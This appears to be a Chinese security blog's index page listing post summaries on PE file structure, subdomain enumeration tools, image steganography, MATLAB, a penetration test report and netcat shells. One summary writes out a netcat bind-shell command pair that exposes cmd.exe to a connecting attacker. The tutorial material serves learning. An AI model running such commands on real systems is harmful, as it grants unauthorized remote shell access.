摘要:前言 目前网络上有关PE文件结构说明的文章太多了,自己的这篇文章只是单纯的记录自己对PE文件结构的学习、理解和总结。 基础概念 PE(Portable Executable:可移植的执行体)是Win32环境自身所带的可执行文件格式。它的一些特性继承自Unix的Coff(Common Object F 阅读全文
posted @ 2019-09-30 09:34 Qftm 阅读 (165) 评论 (3) 编辑
摘要:子域名爆破枚举或接管 https://github.com/lijiejie/subDomainsBrute - Lijiejie开发的一款使用广泛的子域名爆破枚举工具 https://github.com/lijiejie/subDomainsBrute - Lijiejie开发的一款使用广泛的子 阅读全文
posted @ 2019-09-29 00:59 Qftm 阅读 (145) 评论 (0) 编辑
摘要:原理简介 针对文件结构的信息隐藏方法需详细掌握文件的格式,利用文件结构块之间的关系或根据块数据和块大小之间的关系来隐藏信息。 BMP(Bitmap-File)图形文件是 Windows 采用的常见图形文件格式,要利用 BMP 位图进行信息隐藏首先需要详细了解 BMP 文件的格式,BMP 图像文件结构 阅读全文
posted @ 2019-09-19 00:26 Qftm 阅读 (242) 评论 (0) 编辑
摘要:原理简介 离散傅立叶、离散余弦和离散小波变换是图像、音频信号常用基础操作,时域信号转换到不同变换域以后,会导致不同程度的能量集中,信息隐藏利用这个原理在变换域选择适当位置系数进行修改,嵌入信息,并确保图像、音频信号经处理后感官质量无明显变化。 变换定义 一维离散傅立叶变换对定义: 一维离散余弦变换对 阅读全文
posted @ 2019-09-14 17:05 Qftm 阅读 (148) 评论 (0) 编辑
摘要:常用命令 dir:列出当前目录下的所有文件 clc:清除命令窗 clear all:清除环境(从内存中清除所有变量) who:将内存中的当前变量以简单形式列出 close all: 关闭所有的 Figure 窗口 变量设置 (1).变量命名 MATLAB 的变量名以字母打头,后最多可跟 19 个字母 阅读全文
posted @ 2019-09-12 00:46 Qftm 阅读 (89) 评论 (0) 编辑
摘要:笔者《Qftm》原文发布: https://xz.aliyun.com/t/6223 0x00 前言 最近,一次授权的渗透测试项目意外的撞出了(CVE 2018 14418)新的火花,在这里分享给大家,同时简单记录一下自己的渗透测试过程,一些敏感信息已打码,相关漏洞已报送厂商修复。 0x01 Msv 阅读全文
posted @ 2019-09-11 21:51 Qftm 阅读 (45) 评论 (0) 编辑
摘要:笔者《Qftm》原文发布:https://www.freebuf.com/articles/network/211643.html 阅读全文
posted @ 2019-09-05 17:02 Qftm 阅读 (28) 评论 (0) 编辑
摘要:攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动。 同时 阅读全文
posted @ 2019-08-03 23:16 Qftm 阅读 (42) 评论 (0) 编辑
摘要:NC 反弹 shell 攻击场景: 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接 反向 She 阅读全文
posted @ 2019-08-03 21:56 Qftm 阅读 (122) 评论 (0) 编辑
摘要:笔者《Qftm》原文发布:https://www.freebuf.com/articles/web/208778.html 阅读全文
posted @ 2019-08-03 12:43 Qftm 阅读 (75) 评论 (0) 编辑